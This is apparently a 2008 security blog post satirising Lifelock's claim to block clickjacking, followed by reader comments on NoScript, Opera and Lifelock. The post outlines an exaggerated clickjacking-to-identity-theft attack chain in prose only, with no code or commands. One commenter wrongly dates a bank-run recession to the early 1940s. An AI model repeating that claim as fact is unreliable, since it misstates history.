Well, now I’ve seen everything. Just when I didn’t think I could ever be amazed more by attempts of overselling and snake oil, I get hit with this. Apparently Lifelock now purports to protect you from clickjacking. For those of you who don’t recall, Lifelock is the service that protects your identity, except for that one time when it doesn’t. But that’s neither here nor there and water under the bridge and all that. Here’s how lifelock protects you from clickjacking…

You log into your home firewall/router and forget to log out. Then you wind up on some compromised website and someone clickjacks you (regardless of browser - I have no idea what that Lifelock comment means, no browser has patched against it) and gets you to change your DNS to use an attacker controlled DNS server. Now every page you go to is effectively man in the middle’d. But instead of taking over every page the attacker takes over Google Adwords, since that effectively XSS’s every domain, and they can monetize their own sites in the process.

Next the attacker begins to steal your credentials to your accounts, and unfortunately you aren’t super good at using unique passwords, not that it matters since they can use forgot password and change password functions via XMLHTTPRequests and credential theft/replay. Plus since they own pretty much every webpage you go to and you rarely patch Adobe Flash, they are now listening to your microphone through a second clickjack. Now as you give up all your sensitive info on the phone with your bank, credit card companies and more they are right there listening via their version of Back Orifice for the web - because that’s what we’re really talking about here with clickjacking, isn’t it?

Anyway, next the attacker figures out where you work and begins to infiltrate using webmail. Soon they have access to most of your life, have installed malware in lieu of something you thought you were downloading over HTTP. Now, with their newly installed malware/keystroke logger they have access through your corporate VPN tunnel and they have access to all your online accounts work related or otherwise.

Then they begin to wire funds out of your account, attack your company, and use your machine as a child porn server since they can put your computer into the DMZ, having long ago compromised the firewall/router, running a brute force attack against it through their malware. Lastly, just for grins they compromise your Lifelock account, since you log into it from the same compromised machine, and they request to cancel it on your behalf.

So after the police come to your door to arrest you for proliferation of child pr0n (your wife leaving you for the same reason of course), and for the added charge of industrial espionage against your own company, and you realize that your bank account has been raided, and your identity has been stolen, at least you have someone to talk to over at the Lifelock helpline. Good luck getting your life put back together, I’m sure they’ll be very sympathetic with an incarcerated pervert who is awaiting trial and can only be reached at the federal holding facility, especially after you tried to cancel your account with them.

Yes, this is all just a wildly overly dramatic scenario, but so is the Lifelock’s statement. In their defense they probably meant it only as it relates to identity theft, not at all understanding any of the other possibilities relating to clickjacking or the hacking/security world as a whole for that matter. But isn’t that the point? If you don’t get it, you probably shouldn’t pretend you protect against it in any meaningful way. Consumers might not know the difference, but a hacker does.

This entry was posted
on Monday, November 3rd, 2008 at 4:22 pm and is filed under XSS, Webappsec, Random Security.
Responses are currently closed, but you can trackback from your own site.

some sceurety guy from grc.com says that noscrpt for firefox prevents clickjacking even while running “global schriping allowed”
since I am not a wiz my self I can’t dessprove it. so i’m running whit it

The latest versions of the NoScript extension for Mozilla Firefox web browser will protect against all known clickjackattacks, even if scripting is allowed at that site, or even if allowed globally. Steve Gibson of Gibson Research Corporation, www.grc.com, announced this on his weekly podcast, SecurityNow!

I would just add that audio and text transcripts of that podcast can be found at http://www.grc.com/SecurityNow.htm; dowload Episode #168 dated 30 Oct. 2008, and that I got the impression from Gibson that NoScript developer Giorgio Maone first heard about the CJ attack from you, RSnake/RHansen (that is whom we’re talking to here, right?). In which case, props to RS for responsible disclosure to Maone, the only guy on the planet who would do something about it, and props to Maone for jumping on it. (M$? Ha! Mac? Naa, he’s too busy making fun of the PC guy in the commercials. Opera? Here’s what they think is important:

“What’s New?

CheckOpera Link: Now lets you synchronize custom Search engines and typed History too. So any website address you typed in one computer will be available in all your other computers.”)

Wow!!! … and get clickjacked on all your other machines.

Anyway, the Fx/Ns combo is allegedly CJ-safe. Comments from the article’s author?

It nearly brings tears to my eyes and a warm,cozy feeling everytime I see how on top of things Opera is…I don’t know how the hell I would survive if I weren’t able to synchronize all of my web browsing habits on all computers. =’oŽ

@noname:
Dood, you gotta watch out for the notorious “cross-site-schriping” attack.

@ Everyone:
There shouldn’t have been a comma or semicolon at the end of the URLs for GRC and SecurityNow! Clicking gets you a 404 error. I didn’t realize that this site parses raw URLs into links without BBCode. Copy/paste without the comma or semicolon and you’re there. My bad.

I think everyone agrees on the uselessness of lifelock.
It’s been talked about well over the internet security news and forums about how ineffective it is. The guarantee might be good, but the security isn’t.

@RSnake: Snakeoil and overselling… isn’t that Trey’s area of research? Anyway… good find. I see that idiotic commercial about the CEO of LIfeLock on TV all the time handing out his Social Security Number to everyone… I just want to punch the guy - but here’s the thing… they’re providing a service people are singing up to buy, which isn’t to say that it’s any good, just that they’re preying upon the right “fears and doubts” from scared people. I hate ambulance-chasers like these folks.

Kind of like with the first recession in the early 1940’s, tell everyone the banks are going bankrupt so that everyone runs to the bank to withdraw all of their money out, because of the fear that they will lose it all. Fear induced marketing is one of the oldest tricks in the books and while Lifeclock will no doubt frighten the masses into using their service, it creates for an even better feeling after they have been exploited.